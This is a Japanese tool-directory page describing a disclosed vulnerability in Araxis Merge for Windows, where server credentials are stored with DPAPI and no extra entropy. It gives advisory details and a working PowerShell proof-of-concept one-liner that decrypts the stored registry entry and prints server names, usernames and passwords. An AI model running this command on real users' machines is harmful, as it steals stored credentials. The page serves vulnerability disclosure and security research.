Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-92680 — Araxis MergeのDPAPIで保護されたサーバー認証情報を復号する概念実証(CVE-2026-92680)。Windows上での不十分に保護された認証情報ストレージを実証する。 | Kitploit
ツール/GitHubGitHub/grepstrength/cve-2026-92680
パスワードクラッキング脆弱性分析エクスプロイト暗号化
GitHubgrepstrength/cve-2026-92680

CVE-2026-92680

Araxis MergeのDPAPIで保護されたサーバー認証情報を復号する概念実証(CVE-2026-92680)。Windows上での不十分に保護された認証情報ストレージを実証する。

リポジトリを見る
110日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-92680

Araxis Merge for Windows は、サーバー認証情報を DPAPI で保存する際に pOptionalEntropy を NULL に設定しています。これにより、同じユーザーコンテキストで実行される任意のコードがそれらを復号できます。

詳細な解説: https://grepstrength.com/research/araxis-merge

CVECVE-2026-92680
CWECWE-522: 不十分に保護された認証情報
CVSS v3.15.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
ベンダーAraxis Ltd.
影響を受けるバージョンAraxis Merge for Windows 2011.4074 から 2026.0
修正バージョン2026.1
ベンダーアドバイザリMerge-SA-26-00
報告日2026-08-18
公開日2026-XX-XX
報告者grepStrength

概念実証

これは HKCU\Software\Araxis\Merge\7.1\Passwords を復号して解析します。これは、元々認証情報を保存したのと同じ Windows ユーザーとして実行する必要があります。

root@kitploit:~
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize

注記

すべてのテストは、grepStength Security が所有するシステム上で、合成認証情報のみを使用して実施されました。これは Araxis Ltd. に報告され、修正が利用可能になった後に公開開示されました。

ライセンス

MIT

ツールをダウンロード